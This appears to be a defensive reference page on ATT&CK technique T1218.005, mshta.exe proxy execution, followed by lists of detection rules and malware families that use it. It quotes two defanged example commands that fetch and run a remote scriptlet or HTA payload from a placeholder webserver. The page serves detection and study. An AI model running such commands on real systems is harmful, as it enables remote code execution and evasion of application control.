T1218.005 Mshta — ATT&CK Technique
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
Detection coverage (20)
- Potential Baby Shark Malware Activity high
- HackTool - CACTUSTORCH Remote Thread Creation high
- Csc.EXE Execution Form Potentially Suspicious Parent high
- Suspicious JavaScript Execution Via Mshta.EXE high
- Remotely Hosted HTA File Executed Via Mshta.EXE high
- Suspicious MSHTA Child Process high
- Potential LethalHTA Technique Execution high
- MSHTA Execution with Suspicious File Extensions high
- Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI
- Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download
- Detect mshta inline hta execution
- Detect mshta renamed
- Detect MSHTA Url in Command Line
- Detect Rundll32 Inline HTA Execution
- Mshta spawning Rundll32 OR Regsvr32 Process
- Suspicious mshta child process
- Suspicious mshta spawn
- Windows Mshta Execution In Registry
- Windows MSHTA Writing to World Writable Path
- Windows Process Writing File to World Writable Path
Malware using this technique
- Pteranodon
- Lumma Stealer
- Xbash
- NanHaiShu
- BabyShark
- Metamorfo
- Sibot
- Koadic
- Revenge RAT
- POWERSTATS
- Covenant